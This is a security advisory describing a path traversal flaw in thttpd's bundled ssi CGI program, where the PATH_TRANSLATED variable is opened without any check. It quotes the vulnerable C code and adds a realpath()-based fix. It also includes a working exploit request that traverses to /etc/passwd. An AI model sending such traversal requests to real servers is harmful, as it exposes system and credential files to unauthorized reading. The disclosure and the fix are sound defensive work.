The thttpd web server comes with a CGI script called /cgi-bin/ssi which allows any file on the system to be read. Exploit URL included.
ssi (server-side includes) is a CGI proggie that comes by default
with the thttpd web server; I am not sure about others.
ssi has a nasty bug with regard to the PATH_TRANSLATED env var.
As you can see in the code below, the contents of PATH_TRANSLATED get copied
into path_translated, which gets fopen()'ed later.
It does no checking on the path_translated string. After it opens the file,
it runs the read_file() function, which returns the contents of fp.
So, as you can plainly see, we can view any file on the system.
Try:
    GET /cgi-bin/ssi//../../../../../../../../../etc/passwd
This would yield the passwd file.
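    /* The path comes straight from the environment set up for the CGI. */
    path_translated = getenv( "PATH_TRANSLATED" );
    if ( path_translated == (char*) 0 )
        {
        internal_error( "Couldn't get PATH_TRANSLATED environment variable." );
        exit( 1 );
        }
    /* Open it. No check is made on where path_translated points. */
    fp = fopen( path_translated, "r" );
    /* The contents of fp are sent back to the client. */
    read_file( path_info, path_translated, fp );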
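
One way to add the missing check, as an added example (not code from thttpd or from the original advisory): canonicalize the path with realpath() and refuse anything that resolves outside the document root before it is opened. The function names, the root argument and the "/usr" sample root are assumptions made for illustration.

```c
#define _XOPEN_SOURCE 700   /* for realpath() */
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Resolve `path` (symlinks, "." and ".." included) and accept it only if the
   result is `root` itself or lies beneath it. On success the canonical path is
   written to `out` (PATH_MAX bytes) and 1 is returned. Fails closed with 0. */
int resolve_within_root(const char *root, const char *path, char *out)
{
    char real_root[PATH_MAX];
    size_t n;

    if (root == NULL || path == NULL || out == NULL)
        return 0;
    if (realpath(root, real_root) == NULL || realpath(path, out) == NULL)
        return 0;
    n = strlen(real_root);
    if (n == 1)                       /* root is "/": nothing lies outside it */
        return 1;
    if (strncmp(out, real_root, n) != 0)
        return 0;
    /* Component boundary: "/srv/www-old" must not pass for root "/srv/www". */
    return out[n] == '\0' || out[n] == '/';
}

/* Hypothetical replacement for the bare fopen( path_translated, "r" ). */
FILE *open_confined(const char *root, const char *path_translated)
{
    char resolved[PATH_MAX];

    if (!resolve_within_root(root, path_translated, resolved))
        return NULL;
    return fopen(resolved, "r");      /* open the checked path, not the raw one */
}

int main(void)
{
    /* Constructed inputs: "/usr" stands in for the document root. */
    const char *root = "/usr";
    const char *samples[] = { "/usr/bin", "/usr/bin/..", "/usr//../../../etc/passwd" };
    char resolved[PATH_MAX];
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-28s -> %s\n", samples[i],
               resolve_within_root(root, samples[i], resolved) ? resolved : "REJECTED");
    return 0;
}
```

A symlink swapped in between the check and the fopen() can still redirect the open, so the document root should not be writable by untrusted users.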